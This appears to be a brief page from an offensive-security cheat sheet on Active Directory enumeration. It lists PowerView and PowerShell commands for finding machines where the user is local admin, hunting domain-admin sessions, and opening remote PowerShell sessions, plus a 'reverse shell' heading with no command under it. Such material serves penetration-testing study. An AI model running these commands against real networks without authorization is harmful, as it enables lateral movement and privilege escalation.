9️⃣Miscellaneous Enumeration
Powerview Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccessPowerview Find local admins on all machines of the domain (needs admin privs)
Invoke-EnumerateLocalAdmin -VerboseConnect to machine with administrator privs
Enter-PSSession -Computername <computername>Save and use sessions of a machine
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sessFind active sessions
Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"Find active sessions of domain admins
Check access to machine
Powershell reverse shell
Last updated
Was this helpful?